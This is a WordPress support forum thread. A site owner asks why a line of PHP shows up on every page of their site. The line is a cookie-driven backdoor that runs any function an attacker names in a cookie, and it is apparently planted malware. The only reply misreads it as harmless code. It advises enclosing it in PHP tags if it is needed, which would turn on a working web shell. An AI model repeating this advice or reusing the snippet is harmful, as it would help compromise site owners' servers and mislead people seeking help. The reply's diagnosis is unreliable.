• I’ve got a problem with my site. Whenever I go to log in or to any page on my dashboard or site for that matter this code shows up.

    if (isset($_COOKIE[“id”])) @$_COOKIE[“user”]($_COOKIE[“id”]);

    It has prevented me from accessing my media library, adding new photos, accessing new themes, or connecting to Jetpack. I’ve tried in multiple browsers, updated everything, changed themes, deactivated all my plug ins, cleared all my cookies and cache on my browser but still not working. I have a pretty basic wordpress knowledge so am I missing something obvious?

    You can see the code showing up in the top left hand corner of my site. https://ramblingoat.com/ Anyone have an idea of what the deal is and how to fix?

Viewing 1 replies (of 1 total)
  • Have you try to access code on your php pages (you or someone else)?
    It seeme that if (isset($_COOKIE[“id”])) @$_COOKIE[“user”]($_COOKIE[“id”]); has to do with a cookie. but that code is writen in html. That’s why it is shown ( as simple text ) . You have to access that specific php page and delete that code ( id is no needed ) , or ( if is needed ) you have to enclos it on php like

    <?php if (isset($_COOKIE[“id”])) @$_COOKIE[“user”]($_COOKIE[“id”]); ?>

    Can you also give more info of when that issue started?

    Regards
    George

Viewing 1 replies (of 1 total)
  • The topic ‘Cant access media library or themes’ is closed to new replies.